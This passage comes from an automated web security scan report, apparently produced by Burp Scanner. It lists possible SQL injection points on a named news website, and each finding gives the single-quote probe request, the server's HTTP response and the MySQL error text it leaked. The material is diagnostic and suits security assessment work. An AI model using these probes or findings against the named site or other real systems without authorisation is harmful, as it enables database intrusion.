Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.68. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article'/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article''/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.69. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article/237622' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/content/article/237622'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.70. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/content/article/237622?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/content/article/237622?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.71. http://www.soundingsonline.com/component/mailto/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/mailto/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component'/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1' at line 1</font>
...[SNIP]...

Request 2

GET /component''/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.72. http://www.soundingsonline.com/component/mailto/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/mailto/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/mailto'/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto''/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.73. http://www.soundingsonline.com/component/mailto/ [link parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/mailto/

Issue detail

The link parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the link parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29t' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.74. http://www.soundingsonline.com/component/mailto/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/mailto/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D&1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.75. http://www.soundingsonline.com/component/mailto/ [tmpl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/mailto/

Issue detail

The tmpl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tmpl parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/mailto/?tmpl=component'&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/mailto/?tmpl=component''&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.76. http://www.soundingsonline.com/component/yvcomment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/yvcomment/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

